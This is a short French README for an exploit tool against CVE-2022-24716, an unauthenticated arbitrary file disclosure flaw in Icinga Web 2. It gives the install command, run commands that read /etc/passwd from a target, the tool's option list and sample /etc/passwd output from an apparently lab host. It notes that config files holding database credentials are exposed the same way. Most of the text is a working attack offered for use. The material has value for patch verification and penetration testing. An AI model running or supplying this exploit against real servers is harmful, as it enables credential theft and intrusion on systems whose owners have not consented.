
CVE-2022-24716 (Divulgation arbitraire de fichiers Icingaweb2)
Icinga Web 2 est une interface web de surveillance open source, un framework et une interface en ligne de commande. Des utilisateurs non authentifiés peuvent divulguer le contenu de fichiers système locaux accessibles depuis le serveur web, y compris les fichiers de configuration d'icingaweb2 contenant les identifiants de base de données.
CVE-2022-24716 nécessite golang et pour le télécharger, il suffit d'utiliser :
go install -v github.com/joaoviictorti/CVE-2022-24716@latest
go run .\CVE-2022-24716.go -u http://localhost -f /etc/passwd
go run .\CVE-2022-24716.go -u http://localhost -f /etc/passwd -p http://127.0.0.1:8080
Ceci affichera l'aide de l'outil. Voici tous les paramètres qu'il supporte :
usage: CVE-2022-24716 [-h|--help] -u|--url "<value>" -f|--file "<value>"
[-p|--proxy "<value>"]
CVE-2022-24716 - Arbitrary File Disclosure
Arguments:
-h --help Print help information
-u --url Insert url
-f --file Insert file
-p --proxy Insert proxy
go run .\CVE-2022-24716.go -u http://icinga.cerberus.local:8080 -f /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
......